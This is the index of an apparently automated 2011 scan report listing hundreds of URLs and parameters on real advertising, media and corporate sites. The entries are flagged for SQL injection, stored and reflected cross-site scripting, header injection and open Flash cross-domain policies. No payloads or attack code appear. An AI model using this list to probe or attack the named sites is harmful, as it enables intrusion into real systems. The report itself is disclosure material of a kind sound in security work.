XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09172011-01
Report generated by XSS.CX at Sat Sep 17 12:36:31 CDT 2011.
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
1. SQL injection
1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]
1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]
1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]
1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]
1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]
1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]
1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]
1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]
1.10. http://googleads.g.doubleclick.net/pagead/ads [jsv parameter]
1.11. http://googleads.g.doubleclick.net/pagead/ads [slotname parameter]
1.12. http://googleads.g.doubleclick.net/pagead/ads [url parameter]
1.13. http://q1.checkm8.com/adam/detect [C cookie]
1.14. http://q1.checkm8.com/adam/detect [WIDTH_RANGE parameter]
1.15. http://q1.checkm8.com/adam/detect [cat parameter]
1.16. http://q1.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]
1.17. http://q1.checkm8.com/adam/report [C cookie]
1.18. http://q1.checkm8.com/adam/report [Referer HTTP header]
1.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGMnyCSDw8gkqCUx5AgD_____HzIFSXkCAAc [REST URL parameter 1]
1.20. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ktextColor parameter]
1.21. http://tag.contextweb.com/TagPublish/GetAd.aspx [Referer HTTP header]
1.22. http://tag.contextweb.com/TagPublish/GetAd.aspx [ca parameter]
1.23. http://tag.contextweb.com/TagPublish/GetAd.aspx [cwu parameter]
1.24. http://tag.contextweb.com/TagPublish/GetAd.aspx [cxy parameter]
1.25. http://tag.contextweb.com/TagPublish/GetAd.aspx [dw parameter]
1.26. http://tag.contextweb.com/TagPublish/GetAd.aspx [epid parameter]
1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]
1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]
1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]
1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]
1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]
1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]
1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]
1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]
1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]
1.37. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_medium parameter]
1.38. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_source parameter]
1.39. http://www.bradsdeals.com/res/opt/global.js [v parameter]
1.40. http://www.bradsdeals.com/res/opt/screen.css [v parameter]
2. Cross-site scripting (stored)
2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]
2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]
3. HTTP header injection
3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]
3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]
3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]
4. Cross-site scripting (reflected)
4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
4.23. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
4.24. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
4.25. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
4.26. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
4.27. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
4.28. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
4.29. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
4.30. http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
4.31. http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
4.32. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
4.33. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
4.34. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
4.35. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
4.36. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
4.37. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
4.38. http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
4.39. http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
4.40. http://ad.yieldmanager.com/imp [u parameter]
4.41. http://adnxs.revsci.net/imp [Z parameter]
4.42. http://adnxs.revsci.net/imp [s parameter]
4.43. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
4.44. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
4.45. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
4.48. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
4.49. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
4.50. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
4.51. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
4.52. http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
4.53. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
4.54. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
4.55. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
4.56. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
4.57. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
4.58. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
4.59. http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
4.60. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
4.61. http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
4.62. http://api.bizographics.com/v2/profile.redirect [api_key parameter]
4.63. http://api.dimestore.com/viapi [id parameter]
4.64. http://ar.voicefive.com/b/rc.pli [func parameter]
4.65. http://b.scorecardresearch.com/beacon.js [c1 parameter]
4.66. http://b.scorecardresearch.com/beacon.js [c10 parameter]
4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]
4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]
4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]
4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]
4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]
4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]
4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
4.80. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
4.81. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
4.82. http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
4.83. http://blekko.com/autocomplete [query parameter]
4.84. http://bostonherald.com/includes/processAds.bg [companion parameter]
4.85. http://bostonherald.com/includes/processAds.bg [companion parameter]
4.86. http://bostonherald.com/includes/processAds.bg [page parameter]
4.87. http://bostonherald.com/includes/processAds.bg [page parameter]
4.88. http://bostonherald.com/includes/processAds.bg [position parameter]
4.89. http://bostonherald.com/includes/processAds.bg [position parameter]
4.90. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
4.91. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
4.92. http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
4.93. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
4.94. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
4.95. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
4.97. http://choices.truste.com/ca [c parameter]
4.98. http://choices.truste.com/ca [cid parameter]
4.99. http://choices.truste.com/ca [iplc parameter]
4.100. http://choices.truste.com/ca [plc parameter]
4.101. http://choices.truste.com/ca [zi parameter]
4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
4.105. http://event.adxpose.com/event.flow [uid parameter]
4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
4.114. http://g2.gumgum.com/services/get [callback parameter]
4.115. http://ib.adnxs.com/ptj [redir parameter]
4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
4.121. http://js.revsci.net/gateway/gw.js [ali parameter]
4.122. http://js.revsci.net/gateway/gw.js [cid parameter]
4.123. http://js.revsci.net/gateway/gw.js [clen parameter]
4.124. http://js.revsci.net/gateway/gw.js [csid parameter]
4.125. http://js.revsci.net/gateway/gw.js [p parameter]
4.126. http://js.revsci.net/gateway/gw.js [pid parameter]
4.127. http://js.revsci.net/gateway/gw.js [pli parameter]
4.128. http://js.revsci.net/gateway/gw.js [ref parameter]
4.129. http://js.revsci.net/gateway/gw.js [sid parameter]
4.130. http://js.revsci.net/gateway/gw.js [ver parameter]
4.131. http://js.revsci.net/gateway/gw.js [vid parameter]
4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
4.140. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]
4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]
4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]
4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]
4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]
4.164. http://rt1702.infolinks.com/action/doq.htm [rid parameter]
4.165. http://rt1803.infolinks.com/action/doq.htm [rid parameter]
4.166. http://rt1804.infolinks.com/action/doq.htm [rid parameter]
4.167. http://rt1901.infolinks.com/action/doq.htm [rid parameter]
4.168. http://rt1903.infolinks.com/action/doq.htm [rid parameter]
4.169. http://s19.sitemeter.com/js/counter.asp [site parameter]
4.170. http://s19.sitemeter.com/js/counter.js [site parameter]
4.171. http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]
4.172. http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]
4.173. http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]
4.174. http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]
4.175. http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]
4.176. http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]
4.177. http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]
4.178. http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]
4.179. http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]
4.180. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
4.181. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
4.182. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
4.183. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
4.184. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
4.185. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
4.186. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
4.187. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
4.188. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
4.189. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
4.190. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
4.191. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
4.192. http://tps31.doubleverify.com/visit.js [plc parameter]
4.193. http://tps31.doubleverify.com/visit.js [sid parameter]
4.194. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]
4.195. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]
4.196. http://widgets.mobilelocalnews.com/ [uid parameter]
4.197. http://www-01.ibm.com/support/docview.wss [aid parameter]
4.198. http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]
4.199. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]
4.200. http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]
4.201. http://www.bostonherald.com/includes/processAds.bg [companion parameter]
4.202. http://www.bostonherald.com/includes/processAds.bg [companion parameter]
4.203. http://www.bostonherald.com/includes/processAds.bg [page parameter]
4.204. http://www.bostonherald.com/includes/processAds.bg [page parameter]
4.205. http://www.bostonherald.com/includes/processAds.bg [position parameter]
4.206. http://www.bostonherald.com/includes/processAds.bg [position parameter]
4.207. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
4.208. http://www.disenter.com/search.php [searchString parameter]
4.209. http://www.disenter.com/search.php [searchString parameter]
4.210. http://www.google.com/search [tch parameter]
4.211. http://www.jcp.org/en/home/index [REST URL parameter 3]
4.212. http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]
4.213. http://www.jcp.org/en/jsr/detail [id parameter]
4.214. http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]
4.215. http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]
4.216. http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]
4.217. http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]
4.218. http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]
4.219. http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]
4.220. http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]
4.221. http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]
4.222. http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]
4.223. http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]
4.224. http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]
4.225. http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]
4.226. http://www.kaltura.com//api_v3/index.php [ks parameter]
4.227. http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]
4.228. http://www.kaltura.com//api_v3/index.php [service parameter]
4.229. http://www.open.com.au/cgi-bin/sf.cgi [config parameter]
4.230. https://www.open.com.au/cgi-bin/sf.cgi [config parameter]
4.231. https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]
4.232. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
4.233. http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
4.234. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
4.235. http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
4.236. http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]
4.237. http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]
4.238. http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]
4.239. http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]
4.240. http://adnxs.revsci.net/imp [Referer HTTP header]
4.241. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]
4.242. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
4.243. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
4.244. http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]
4.245. http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]
4.246. http://3ps.go.com/DynamicAd [tqq cookie]
4.247. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
4.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
4.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
4.250. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
4.251. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
4.252. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]
4.253. http://livechat.iadvize.com/chat_init.js [vuid cookie]
4.254. http://s19.sitemeter.com/js/counter.asp [IP cookie]
4.255. http://s19.sitemeter.com/js/counter.js [IP cookie]
4.256. http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]
5. Flash cross-domain policy
5.1. http://2912a.v.fwmrm.net/crossdomain.xml
5.2. http://3ps.go.com/crossdomain.xml
5.3. http://a.collective-media.net/crossdomain.xml
5.4. http://a.tribalfusion.com/crossdomain.xml
5.5. http://a1.interclick.com/crossdomain.xml
5.6. http://abc.csar.go.com/crossdomain.xml
5.7. http://action.media6degrees.com/crossdomain.xml
5.8. http://ad.afy11.net/crossdomain.xml
5.9. http://ad.auditude.com/crossdomain.xml
5.10. http://ad.turn.com/crossdomain.xml
5.11. http://adm.fwmrm.net/crossdomain.xml
5.12. http://admin.brightcove.com/crossdomain.xml
5.13. http://ads.yimg.com/crossdomain.xml
5.14. http://adserver.teracent.net/crossdomain.xml
5.15. http://adunit.cdn.auditude.com/crossdomain.xml
5.16. http://afe.specificclick.net/crossdomain.xml
5.17. http://alerts.4info.com/crossdomain.xml
5.18. http://amch.questionmarket.com/crossdomain.xml
5.19. http://analytics.newsinc.com/crossdomain.xml
5.20. http://aperture.displaymarketplace.com/crossdomain.xml
5.21. http://api.dimestore.com/crossdomain.xml
5.22. http://api.facebook.com/crossdomain.xml
5.23. http://ar.voicefive.com/crossdomain.xml
5.24. http://as.casalemedia.com/crossdomain.xml
5.25. http://as1.suitesmart.com/crossdomain.xml
5.26. http://assets.newsinc.com/crossdomain.xml
5.27. http://at.amgdgt.com/crossdomain.xml
5.28. http://b.voicefive.com/crossdomain.xml
5.29. http://b3.mookie1.com/crossdomain.xml
5.30. http://beta.abc.go.com/crossdomain.xml
5.31. http://bp.specificclick.net/crossdomain.xml
5.32. http://bs.serving-sys.com/crossdomain.xml
5.33. http://c.betrad.com/crossdomain.xml
5.34. http://c.brightcove.com/crossdomain.xml
5.35. http://cache.specificmedia.com/crossdomain.xml
5.36. http://cache2-scripts.pressdisplay.com/crossdomain.xml
5.37. http://cache2-styles.pressdisplay.com/crossdomain.xml
5.38. http://cdn.gigya.com/crossdomain.xml
5.39. http://cdn.kaltura.com/crossdomain.xml
5.40. http://cdn.turn.com/crossdomain.xml
5.41. http://cdnbakmi.kaltura.com/crossdomain.xml
5.42. http://clk.atdmt.com/crossdomain.xml
5.43. http://cplads.appspot.com/crossdomain.xml
5.44. http://d14.zedo.com/crossdomain.xml
5.45. http://d7.zedo.com/crossdomain.xml
5.46. http://dc.tremormedia.com/crossdomain.xml
5.47. http://dp.33across.com/crossdomain.xml
5.48. http://ds.serving-sys.com/crossdomain.xml
5.49. http://edge.aperture.displaymarketplace.com/crossdomain.xml
5.50. http://event.adxpose.com/crossdomain.xml
5.51. http://external.ak.fbcdn.net/crossdomain.xml
5.52. http://fw.adsafeprotected.com/crossdomain.xml
5.53. http://g-pixel.invitemedia.com/crossdomain.xml
5.54. http://g.ca.bid.invitemedia.com/crossdomain.xml
5.55. http://g2.gumgum.com/crossdomain.xml
5.56. http://goku.brightcove.com/crossdomain.xml
5.57. http://gscounters.gigya.com/crossdomain.xml
5.58. http://i.w55c.net/crossdomain.xml
5.59. http://ib.adnxs.com/crossdomain.xml
5.60. http://imagec12.247realmedia.com/crossdomain.xml
5.61. http://imp.fetchback.com/crossdomain.xml
5.62. http://js.revsci.net/crossdomain.xml
5.63. http://l.betrad.com/crossdomain.xml
5.64. http://l.yimg.com/crossdomain.xml
5.65. http://ll.static.abc.com/crossdomain.xml
5.66. http://llnwdo28.tmz.com/crossdomain.xml
5.67. http://load.exelator.com/crossdomain.xml
5.68. http://load.tubemogul.com/crossdomain.xml
5.69. http://loadm.exelator.com/crossdomain.xml
5.70. http://log.go.com/crossdomain.xml
5.71. http://map.media6degrees.com/crossdomain.xml
5.72. http://media.fastclick.net/crossdomain.xml
5.73. http://metrics.tmz.com/crossdomain.xml
5.74. http://network.realmedia.com/crossdomain.xml
5.75. http://oascentral.bostonherald.com/crossdomain.xml
5.76. http://objects.tremormedia.com/crossdomain.xml
5.77. http://odb.outbrain.com/crossdomain.xml
5.78. http://ping.crowdscience.com/crossdomain.xml
5.79. http://pix04.revsci.net/crossdomain.xml
5.80. http://pixel.33across.com/crossdomain.xml
5.81. http://pixel.adsafeprotected.com/crossdomain.xml
5.82. http://pixel.invitemedia.com/crossdomain.xml
5.83. http://ps2.newsinc.com/crossdomain.xml
5.84. http://puma.vizu.com/crossdomain.xml
5.85. http://q1.checkm8.com/crossdomain.xml
5.86. http://query.yahooapis.com/crossdomain.xml
5.87. http://r.casalemedia.com/crossdomain.xml
5.88. http://r.turn.com/crossdomain.xml
5.89. http://r1-ads.ace.advertising.com/crossdomain.xml
5.90. http://r1.zedo.com/crossdomain.xml
5.91. http://receive.inplay.tubemogul.com/crossdomain.xml
5.92. http://resources.infolinks.com/crossdomain.xml
5.93. http://rs.gwallet.com/crossdomain.xml
5.94. http://rt1302.infolinks.com/crossdomain.xml
5.95. http://rt1701.infolinks.com/crossdomain.xml
